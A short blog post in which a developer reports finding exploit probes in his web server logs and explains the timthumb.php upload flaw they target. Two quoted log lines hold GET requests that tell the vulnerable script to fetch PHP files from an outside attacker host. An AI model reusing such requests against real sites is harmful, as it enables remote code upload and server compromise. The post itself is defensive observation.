Today, I had an interesting reminder that we are not the only ones surveying web servers. I was looking at the server logs for librivox.bookdesign.biz, a server that provides a web interface into the database that I use for my LibriVox AudioBooks android app. As it turns out, there were a few interesting requests that produced 404 errors. Here they are, below:
184.107.145.18 - - [05/Oct/2012:08:42:27 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/idss.php HTTP/1.1" 404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=3 cpu_ms=0
184.107.145.18 - - [05/Oct/2012:08:42:25 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/petx.php HTTP/1.1" 404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=4 cpu_ms=0
As it turns out, timthumb.php is a WordPress image resizing utility that has a security vulnerability that allows for arbitrary file uploads. You can read about the weakness on the sucuri blog. Of course, it’s no surprise that malicious agents are surveying web servers for vulnerabilities. It’s just interesting to see it happening in practice. Had my server used the offending library, I could now be hosting drive by downloads for some botnet.
I didn’t take the time to thoroughly investigate 184.107.145.18 or arztree.com (The ip address points to a server hosted by iweb.com in Canada, and the domain is registered in Taiwan,) as I think it is safe to assume that the trail of any potential attacker will likely be well covered. Still, the fact of the probing is a reminder that our survey in some way will mirror the efforts of various agents looking for weaknesses in web infrastructure.